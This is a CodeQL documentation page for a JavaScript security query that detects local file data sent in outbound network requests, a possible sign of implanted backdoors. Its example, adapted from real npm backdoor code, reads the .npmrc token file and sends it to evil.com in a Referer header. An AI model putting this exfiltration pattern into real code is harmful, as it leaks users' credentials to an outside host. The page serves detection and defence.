CodeQL documentation

File data in outbound network request

ID: js/file-access-to-http
Kind: path-problem
Security severity: 6.5
Severity: warning
Precision: medium
Tags:
   - security
   - external/cwe/cwe-200
Query suites:
   - javascript-security-extended.qls
   - javascript-security-and-quality.qls


Sending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended: confirm that the file being read is one the program legitimately needs, that the destination host is one the program is expected to contact, and that the data sent does not include credentials or other secrets.

Example

The following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the .npmrc file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.

var fs = require("fs"),
    https = require("https");

// Read the user's npm configuration, which typically holds an auth token.
var content = fs.readFileSync(".npmrc", "utf8");
// Exfiltrate it: the file contents become the value of the Referer header
// on a request to an attacker-controlled host. The response is ignored.
https.get({
  hostname: "evil.com",
  path: "/upload",
  method: "GET",
  headers: { Referer: content }
}, () => { });
